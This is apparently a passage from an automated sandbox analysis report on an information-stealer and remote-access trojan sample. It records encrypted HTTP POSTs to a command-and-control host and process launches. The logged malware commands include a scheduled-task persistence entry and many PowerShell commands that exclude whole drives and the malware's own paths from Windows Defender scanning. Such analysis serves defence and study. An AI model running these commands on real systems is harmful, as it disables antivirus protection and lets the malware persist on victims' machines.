                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqSqjjk2GSU5138UUW4%2BIgR1S4k1uACyAF4BI84AE82%2Bd88XBXDNbTqHiRd9fs1X73pTKwr0DK27DWeyZ%2FEFVRhoktmTuqqYf8C8kJBi3uIH0l2kYgoKEfr3oQM9pw3a7%2Bwe1W0OWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5507ecae7af1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12880&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112431&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          100192.168.2.550080188.114.96.380
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:54.813407898 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:55.165651083 CEST2528OUTData Raw: 5b 5a 5c 5d 5a 5f 54 52 54 5b 52 57 50 59 57 54 50 5a 5d 5c 50 56 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\]Z_TRT[RWPYWTPZ]\PVWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >9%9S<;\0T(.$Z=/'.,21Z%(:$="+#F $P.(
                                                          Oct 20, 2024 18:19:56.106220961 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:56.335443974 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqR%2B9i1EWz6TCJSqPf6izN3nBW57FFHT9GPeAQpopcHkKDeXe%2B3w2Sq4%2FUxNACXm8AoMpiKOyAyiCoaJ%2FgfTTDC%2BACS4fEqQPEAwNSpQow2ifF8fpXTFFtD3ub9e42wh%2BDOhZsuWXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a55132d10230a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13098&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=111204&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:12:17:12
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0x680000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                                                          Imagebase:0x7ff6686a0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP"
                                                          Imagebase:0x7ff6cdfe0000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline"
                                                          Imagebase:0x7ff6686a0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP"
                                                          Imagebase:0x7ff6cdfe0000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:12:17:20
                                                          Start date:20/10/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0x8f0000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 66%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:12:17:20
                                                          Start date:20/10/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0xc20000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff6284c0000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:31
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:33
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:35
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:37
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:41
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:42
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:43
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:45
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:46
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:47
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:48
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:49
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:50
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:51
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:52
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:53
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:54
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:55
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:56
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:57
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:58
                                                          Start time:12:17:21
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe'
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
